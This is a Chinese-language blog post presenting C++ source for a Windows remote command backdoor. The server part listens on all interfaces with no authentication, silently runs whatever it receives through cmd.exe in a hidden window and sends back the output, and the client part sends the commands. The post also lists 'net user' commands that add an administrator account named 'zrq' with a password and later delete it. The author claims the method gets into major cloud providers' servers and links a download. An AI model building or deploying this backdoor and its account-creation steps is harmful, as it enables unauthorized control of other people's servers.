1.前言
最近在做一个节点信息收集的时候,偶然想到一种可以进入服务器的一种方法,这里记录下,需要先运行服务器程序,再通过客户端来添加帐号,提升权限,删除帐号等操作
2.思路
1.做一个可以远程执行命令行的程序
2.通过命令行增加一个新帐号,提升为admin权限,通过微软远程进入,做完后,在服务器上注销账号,通过命令行删除用户,结束
3.我购买了一台阿里云,百度云,腾讯云,华为云这种方法都可以轻松进入
3.具体实现
服务器端部分程序
bool ExecCmdRet(const std::string &strcmd, std::string &strrecv)
{
SECURITY_ATTRIBUTES sa;
HANDLE hRead,hWrite;
bool bret = false;
sa.nLength = sizeof(SECURITY_ATTRIBUTES);
sa.lpSecurityDescriptor = NULL;
sa.bInheritHandle = TRUE;
if (!CreatePipe(&hRead,&hWrite,&sa,0))
return bret;
char szcommand[1024] = {0};
strcpy(szcommand,"Cmd.exe /C ");
strcat(szcommand,strcmd.c_str());
STARTUPINFOA si;
PROCESS_INFORMATION pi;
si.cb = sizeof(STARTUPINFOA);
GetStartupInfoA(&si);
si.hStdError = hWrite;
si.hStdOutput = hWrite;
si.wShowWindow = SW_HIDE;
si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
if (!CreateProcessA(NULL, szcommand, NULL,NULL,TRUE,NULL,NULL,NULL,&si,&pi))
{
CloseHandle(hWrite);
CloseHandle(hRead);
return bret;
}
CloseHandle(hWrite);
char buffer[4096] = {0};
DWORD bytesRead;
WaitForSingleObject(pi.hProcess, 10000);
while (ReadFile(hRead,buffer,4095,&bytesRead,NULL))
{
buffer[bytesRead] = '\0';
strrecv += buffer;
bret = true;
}
CloseHandle(hRead);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
return bret;
}
DWORD WINAPI PortTransfer_2(LPVOID lParam)
{
TransferParam *ConfigInfo = (TransferParam*)lParam;
SOCKET ClientSock, ServerSock = INVALID_SOCKET;
ClientSock = ConfigInfo->LocalData.Pop();
fd_set Fd_Read;
int ret, nRecv;
while(1)
{
FD_ZERO(&Fd_Read);
FD_SET(ClientSock, &Fd_Read);
ret = select(0, &Fd_Read, NULL, NULL, NULL);
if(ret <= 0)
break;
if(FD_ISSET(ClientSock, &Fd_Read))
{
std::string strrecvdata("");
int iResult = 0;
char szbuf[1024] = {0};
iResult = recv(ClientSock, szbuf, 1023, 0);
if (iResult > 0)
{
szbuf[iResult] = '\0';
strrecvdata += szbuf;
}
else
break;
std::string strsenddata("");
if (!strrecvdata.empty())
ExecCmdRet(strrecvdata, strsenddata);
if (strsenddata.empty())
strsenddata = "null";
if (!strsenddata.empty())
{
int nsize = strsenddata.size();
ret = DataSend(ClientSock, strsenddata.c_str(), nsize);
break;
}
}
}
closesocket(ClientSock);
return 0;
}
void begcom(int nsrcport)
{
WSADATA wsd;
WORD sockVersion = MAKEWORD(2, 2);
WSAStartup(sockVersion, &wsd);
SOCKET srcSocket = CreateSocket(inet_addr("0.0.0.0"), nsrcport);
if(srcSocket <= 0)
return;
TransferParam ConfigInfo;
sprintf_s(ConfigInfo.GlobalData.szIP, ADDRSIZE, "%s", "0.0.0.0");
ConfigInfo.GlobalData.wPort = nsrcport;
while(1)
{
SOCKADDR_IN addr;
int addrlen = sizeof(addr);
SOCKET AcceptSocket = accept(srcSocket, (sockaddr*)&addr, &addrlen);
if (AcceptSocket == SOCKET_ERROR)
break;
char szclientip[64] = {0};
strcpy(szclientip,inet_ntoa(addr.sin_addr));
mapSockIp[AcceptSocket] = szclientip;
ConfigInfo.LocalData.Push(AcceptSocket);
DWORD dwThreadId = 0;
HANDLE hThread = CreateThread(NULL, 0, PortTransfer_2, (LPVOID)&ConfigInfo, NULL, &dwThreadId);
if(hThread)
CloseHandle(hThread);
else
Sleep(1000);
}
closesocket(srcSocket);
WSACleanup();
}
客户端程序部分代码
std::string getnodeinfo(const std::string &strip, int nport, const std::string &strsenddata)
{
std::string strrecvdata("");
WSADATA wsd;
SOCKET m_sockKeep = INVALID_SOCKET;
WORD sockVersion = MAKEWORD(2, 2);
WSAStartup(sockVersion, &wsd);
do
{
struct sockaddr_in sa ;
m_sockKeep = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP) ;
if (m_sockKeep == INVALID_SOCKET)
break;
sa.sin_family = AF_INET;
sa.sin_port = htons (nport);
sa.sin_addr.S_un.S_addr = inet_addr (strip.c_str());
if( connect(m_sockKeep, (SOCKADDR *) &sa, sizeof (sa)) == -1)
break;
int nret = send(m_sockKeep, strsenddata.c_str(), strsenddata.size(), 0);
if (nret != SOCKET_ERROR)
{
int iResult = 0;
do
{
char szbuf[4096] = {0};
iResult = recv(m_sockKeep, szbuf, 4095, 0);
if (iResult > 0)
{
szbuf[iResult] = '\0';
strrecvdata += szbuf;
int nNetTimeout = 500;
setsockopt(m_sockKeep, SOL_SOCKET, SO_RCVTIMEO, (char *)&nNetTimeout, sizeof(int));
}
} while (iResult > 0);
}
} while (0);
closesocket(m_sockKeep);
WSACleanup();
return strrecvdata;
}
需要执行的远程命令
net user zrq zrq1986% /add
net localgroup administrators zrq /add
net user zrq /delete
4.备注
1.在windows server2008 系统下注入后正常进入
2.http://download.csdn.net/detail/zhang_ruiqiang/9715665